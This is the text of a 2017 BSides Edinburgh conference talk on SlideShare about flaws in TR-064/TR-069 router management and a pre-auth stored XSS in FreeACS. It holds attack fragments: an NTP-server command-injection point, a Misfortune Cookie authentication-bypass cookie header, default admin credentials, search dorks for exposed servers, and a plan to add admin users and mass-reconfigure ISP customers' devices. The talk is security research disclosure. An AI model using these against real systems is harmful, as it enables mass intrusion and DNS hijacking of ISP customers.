SlideShare a Scribd company logo

BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters

Download as PPTX, PDF
I
infodox

This document discusses vulnerabilities in TR-064 and TR-069 protocols for managing broadband network devices. It describes how TR-064 had issues with no password protection and readable credentials, allowing full device access. It also discusses prior vulnerabilities like Misfortune Cookie that allowed bypassing authentication in TR-069. The document then demonstrates how exploiting a persistent cross-site scripting vulnerability in the FreeACS server software through TR-069 requests could allow adding an administrative user and completely compromising the server. This could potentially allow attacking and reconfiguring millions of networked devices.

1 of 56
TR-06FAIL AND OTHER CPE CONFIGURATION MANAGEMENT DISASTERS
ABOUT.ME • Security Researcher at Xiphos Research • Been poking embedded stuff with a pointy stick for ages. • Formerly: Forensics student, pharmaceuticals student, internet miscreant… • “Proper Bad Dodgy”, “Unprofessional”, “Childish”, “A bad influence”…
WHAT WE WILL BE TALKING ABOUT • The TR-064 Protocol – and related vulnerabilities (TR-06FAIL, etc…) • The TR-069 Protocol – and related vulnerabilities (Misfortune Cookie, etc…) • Hacking ACS Servers for World Domination. • Other Stuff in No Particular Order.
BEFORE WE BEGIN • See the excellent prior art on this subject by Shahar Tal. • “I Hunt TR-069 Admins” and the “Misfortune Cookie” research. • Also, worth reading the specs I link to and trying some of this for yourself.
FIRSTLY, A PRIMER ON TR-XXX • TR-XXX are DSL Forum Specifications. • Basically define specifications for protocols and such to manage broadband networks for ISP’s to follow/implement/ignore. • Of interest today are TR-064 and TR-069, but there are many others…
TR-064 • TR-064 is “LAN-Side DSL CPE Configuration”. • Specification outlines a SOAP based protocol to allow configuration of CPE devices from the LAN side, for example, by “Broadband Setup” software shipped to consumers. • https://www.broadband-forum.org/technical/download/TR- 064.pdf
TR-069 • “CPE WAN Management Protocol” (CWMP) • Outlines the protocol for management of CPE devices over WAN. Also SOAP based, and disgustingly complicated at first glance. • https://www.broadband-forum.org/technical/download/TR- 069_Amendment-5.pdf (yes, its on version 5…)
LETS TALK ABOUT TR-064 A BIT… • TR-064 allows managing ANY setting on a CPE device. • (provided you are on the LAN side of the device…) • Has total read/write to full device configuration. • ACS Configuration (for TR-069 access…) • DNS settings… • Wireless Security settings… • Actually comes with some “security” requirements…
TR-064 SECURITY SPECIFICATIONS • “Access to any action that allows configuration changes to the CPE MUST be password protected.” • “Access to any password-protected action MUST require HTTP digest authentication.” • “Sensitive information, such as passwords, MUST NOT be readable at all.” • Its also only meant to listen on the LAN interface…
TR-064 SECURITY REALITIES, OR “TR- 06FAIL” • Password Protected? Oh hell no! • Actual credentials (WiFi keys…) readable in plaintext? Oh hell yes! • Accessible via the internet? Oh hell yes! • BONUS TRIVIAL COMMAND INJECTION VULN? WHY NOT?!
SO WHAT IS THE OBVIOUS OUTCOME OF THIS?
WELL, DEUTSCHE TELEKOM HAD SOME ISSUES…
AS DID TALKTALK… AND POST OFFICE… ETC… Everyone had a bad time with this… TalkTalk, Eircom, Post Office, Demon, etc…
SO, WHO DID IT? WHERE IS THE ATTRIBUTION PARTY?
NATURALLY, SKIDDIES… I know you can’t actually read this. But it’s the source code of one of the TR-064 exploits that script kiddies are using to spread malware… The important part is: <NewNTPServer1> `commands here` </NewNTPServer1> … Trivial command injection 
THIS WAS NOT THE FIRST TIME, EITHER… • Before TR-06FAIL happened, we had Misfortune Cookie. • Affected the same RomPager server. • Affected the TR-069 component. • Allowed remotely accessing the device without authentication, due to what was effectively a write-what-where kind of issue.
MISFORTUNE COOKIE TL;DR • Allows overwriting internal state variables on the TR-069 service on the router. • Below is from a PoC from Kenzo, exploits Eircom "P-660HW-T1 v3“. • #Bypass the CWMP port check. Bypass the password check • headers = {"Cookie": "C88605=AAAAAAAA;C107257012=x08x0bx27x19x66x 40xb0x21;C107257012=x08x0bx27x19"}
LETS TALK ABOUT TR-069… • Another DSL Forum Specification. • Has a bit about security in it. • Supports TLS! And Authentication! • Protocol is a total fucking mess. “Designed by Committee” kind of crap.
TR-069… • SSL/TLS is totally optional. • Some setups are super solid, with mutual auth (client-side certs, pinning…), others are plaintext. • Authentication? Also kind of optional. • CPE to ACS often uses basic-auth… Kinda. It often uses the “username” as an identifier. • ACS to CPE is often TLS (client cert) but can be shared secret without TLS.
TR-069… • Lots of XML trash in the protocol. • Built on STUN, SOAP, and also there is parts of it that use XMPP… • Attack surface is immense.
SO, WE KNOW THE CPE END IS A CROCK OF SHIT. • What about the ISP end? • Surely the ISP are securing their servers very, very well? • Surely the ISP ACS software is ROCK SOLID ENTERPRISE SOFTWARE!?!? • Surely TR-069 can’t be as bad as you say, right?
AND NOW FOR THE SECOND ACT IN WHICH WE GO HACK THE PLANET.
WORLD DOMINATION.
WORLD DOMINATION • So, say, we wanted to hack CPE devices en-masse. • But we did not feel particularly inclined to actually go hack them one at a time, even with botnet/scanning/etc… • We want to do them all in one go…
I DECIDED TO START AUDITING ACS SERVERS. • Hacking an ACS server is way quicker than hacking millions of CPE’s one at a time. • Auditing has gone slowly. Free time project. • In todays talk, we discuss some hilarious 0day in FreeACS.
DISCLOSURE TIMELINE(S) • At some point in the last while: Found bugs in FreeACS • Between then and now: Worked on weaponizing Said Bugs. • Today: Public Disclosure of Said Bugs.
FREEACS • FreeACS has been around for absolutely ages. • Seems to be maintained by one person, maybe a small group… • Technologies Used: • Apache Tomcat (ew, Java) • MySQL
FREEACS • “The Most Complete TR-069 ACS available for free under the MIT License.” • Most Complete = Most Attack Surface. • I don’t think I have even scratched the surface here…
WHY FREEACS? WELL, THIS SMELLS FUNNY…
LOWEST HANGING FRUIT • Default Login Credentials: admin/xaps (do people change this?) • Shodan: title:FreeACS • Google: intitle:”FreeACS Web Web” • Try Censys.io, Bing, etc… Scan some ports… Etc 
POST-AUTH IS MADE OF XSS WITH OPTIONAL ACS • Found a bunch of reflected XSS vulns post-auth. • Pretty much every parameter ever will reflect some XSS. • Post-Auth, so who cares, but have some screenshots anyway…
WE WANT THE FOLLOWING THINGS… • Pre-Authentication (can’t rely on cracking a login or default credentials) • Remote (exploitable over the internet.) • Privileged Access (gives us “Admin” role on the ACS server) • Easy (because, lets face it, we want to do world domination on the cheap!)
WHAT’S THE PRE-AUTH ATTACK SURFACE? • Well, its pretty huge. • Easiest is to attack from the perspective of a TR-069 client. • So I set about creating a valid CWMP Notify message to send.
XML HELL
WE TRIED FUZZING THE XML… • I got my testing instance to cease responding a bunch of times. • I got bored really, really fast. • So I thought back to “is there something else I can attack here?”
TR-069/CWMP NOTIFY MESSAGES • So there’s the XML. • What is missing in that example is the auth. • It uses Basic Auth.
CWMP NOTIFY AND BASIC AUTH. • Turns out the HTTP Basic Auth “username” is used to denote which device. • Used as a unique identifier. • So its input into things and messed with… And Basic Auth is a loose spec of user input…
THE POSSIBLY UNEXPLOITABLE… • TL;DR: The Basic-Auth username is passed into a SQL query with no sanitizing. • It leads to a fairly trivial SQL injection vulnerability (in theory). • However, there is a char-length limit that meant I couldn’t get anything working easily. Someone else might figure it out. • You CAN cause a perma-DoS of the ACS, however, with a broken SQL statement…
THE EASILY EXPLOITABLE • Username is totally unsanitized. • Username shows up in the UI a load of times when doing ACS admin things. • So maybe we can get some nice XSS?
PERSISTENT XSS IN ADMIN • TL;DR it worked. • Persistent XSS in admin area via a CWMP Notify Message. • Some payload limitations – char length and the likes…
POC – ALERT(“XSS”) PAYLOAD
POC – INJECTING A REMOTE SCRIPT…
SO WE CAN INJECT REMOTE JS INTO ADMIN… • Now lets fully take over the ACS… • I figured the easiest way to do this is to add a new admin user… • So lets look at how that plays out…
ADDING A NEW ADMIN USER • It is just a POST request. • No CSRF tokens or XSS protection going on here. • We can do this in JavaScript we copy and pasted from Stack Overflow!
ADDING ADMIN USER VIA XSS POC…
ADDING ADMIN USER VIA XSS POC
ADMIN USER NAMED HACKER ADDED ;)
SO… WHAT DO… • Scan Internet/Shodan/Censys/Google for FreeACS Servers. • Inject our XSS via CWMP NOTIFY message. • Wait a while for payloads to fire… • Hack the Planet!
WHAT WE CAN DO WITH HACKED ACS? • We can reconfigure settings on all clients (think: all users of ISP) • Change everyones DNS servers for mass pharming attack or worse :D • We can reflash firmwares on all clients – persistent mass rootkitting. • Imagine the cleanup costs of this? • We can probably mess with billing or provision new devices, perhaps…
WITH A BIT OF HACKED ACS… WE ARE LIKE THIS!
THANKS • BSides Edinburgh Organizers! • Shahar Tal, kenzo, and others for the prior-art. • Coworkers and friends (LizardHQ, etc…) for helping • Cybergibbons and Ken from PTP • The DSL Forum, for writing hilarious specs. • Vendors and software developers for keeping me in a job. • You, for putting up with this utter nonsense 
YOU MAY SUBSCRIBE TO MY NEWSLETTER • Email (which constantly goes unanswered): darren.martyn@xiphosresearch.co.uk • XMPP (will be ignored if you don’t use OTR…): infodox@jabber.ccc.de • Twitter (actually might get a response!) @info_dox • mastodon.social (the new super hip not-twitter thing) @lsd

Recommended

Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
infodox
 
BSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on WheelsBSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on Wheels
infodox
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Python
infodox
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowing
Peter Hlavaty
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
Peter Hlavaty
 
Packers
PackersPackers
Packers
Ange Albertini
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
djenoalbania
 

Recommended

Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
infodox
 
BSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on WheelsBSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on Wheels
infodox
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Python
infodox
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowing
Peter Hlavaty
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
Peter Hlavaty
 
Packers
PackersPackers
Packers
Ange Albertini
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
djenoalbania
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
Peter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
Power of linked list
Power of linked listPower of linked list
Power of linked list
Peter Hlavaty
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMM
Positive Hack Days
 
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
Peter Hlavaty
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school intro
Peter Hlavaty
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
Peter Hlavaty
 
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
Peter Hlavaty
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
Peter Hlavaty
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Jeremy Brown
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!
Peter Hlavaty
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
Luis Grangeia
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Peter Hlavaty
 
Distributed Fuzzing Framework Design
Distributed Fuzzing Framework DesignDistributed Fuzzing Framework Design
Distributed Fuzzing Framework Design
bannedit
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
Un) fucking forensics
Un) fucking forensicsUn) fucking forensics
Un) fucking forensics
Shane Macaulay
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
n|u - The Open Security Community
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patterns
Peter Hlavaty
 
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbertA Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
J On The Beach
 
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON
 
A Technical Dive into Defensive Trickery
A Technical Dive into Defensive TrickeryA Technical Dive into Defensive Trickery
A Technical Dive into Defensive Trickery
Dan Kaminsky
 

More Related Content

What's hot

Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
Peter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
Power of linked list
Power of linked listPower of linked list
Power of linked list
Peter Hlavaty
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMM
Positive Hack Days
 
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
Peter Hlavaty
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school intro
Peter Hlavaty
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
Peter Hlavaty
 
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
Peter Hlavaty
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
Peter Hlavaty
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Jeremy Brown
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!
Peter Hlavaty
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
Luis Grangeia
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Peter Hlavaty
 
Distributed Fuzzing Framework Design
Distributed Fuzzing Framework DesignDistributed Fuzzing Framework Design
Distributed Fuzzing Framework Design
bannedit
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
Un) fucking forensics
Un) fucking forensicsUn) fucking forensics
Un) fucking forensics
Shane Macaulay
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
n|u - The Open Security Community
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patterns
Peter Hlavaty
 
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbertA Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
J On The Beach
 

What's hot (20)

Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 
Power of linked list
Power of linked listPower of linked list
Power of linked list
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMM
 
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school intro
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
 
Distributed Fuzzing Framework Design
Distributed Fuzzing Framework DesignDistributed Fuzzing Framework Design
Distributed Fuzzing Framework Design
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Un) fucking forensics
Un) fucking forensicsUn) fucking forensics
Un) fucking forensics
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzing
 
Vulnerability desing patterns
Vulnerability desing patternsVulnerability desing patterns
Vulnerability desing patterns
 
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbertA Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
A Post-Apocalyptic sun.misc.Unsafe World by Christoph engelbert
 

Similar to BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters

44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON
 
A Technical Dive into Defensive Trickery
A Technical Dive into Defensive TrickeryA Technical Dive into Defensive Trickery
A Technical Dive into Defensive Trickery
Dan Kaminsky
 
Bit_Bucket_x31_Final
Bit_Bucket_x31_FinalBit_Bucket_x31_Final
Bit_Bucket_x31_Final
Sam Knutson
 
Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017
Dan Kaminsky
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
UC San Diego
 
Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5
Alec Muffett
 
Coporate Espionage
Coporate EspionageCoporate Espionage
Coporate Espionage
UTD Computer Security Group
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
Priyanka Aash
 
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
Gabriella Davis
 
Network security basics
Network security basicsNetwork security basics
Network security basics
Skillspire LLC
 
Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devices
Yashin Mehaboobe
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Design for Scale / Surge 2010
Design for Scale / Surge 2010Design for Scale / Surge 2010
Design for Scale / Surge 2010
Christopher Brown
 
Open source security
Open source securityOpen source security
Open source security
lrigknat
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
Felipe Prado
 
Shameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocolsShameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocols
Slawomir Jasek
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Jakub Kałużny
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
Darren Duke
 

Similar to BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters (20)

44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
 
A Technical Dive into Defensive Trickery
A Technical Dive into Defensive TrickeryA Technical Dive into Defensive Trickery
A Technical Dive into Defensive Trickery
 
Bit_Bucket_x31_Final
Bit_Bucket_x31_FinalBit_Bucket_x31_Final
Bit_Bucket_x31_Final
 
Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017Wo defensive trickery_13mar2017
Wo defensive trickery_13mar2017
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
 
Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5
 
Coporate Espionage
Coporate EspionageCoporate Espionage
Coporate Espionage
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
 
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
 
Network security basics
Network security basicsNetwork security basics
Network security basics
 
Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devices
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Design for Scale / Surge 2010
Design for Scale / Surge 2010Design for Scale / Surge 2010
Design for Scale / Surge 2010
 
Open source security
Open source securityOpen source security
Open source security
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
 
Shameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocolsShameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocols
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
 

Recently uploaded

留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
留学学历(UoA毕业证)奥克兰大学毕业证成绩单官方原版办理
bseovas
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
uehowe
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
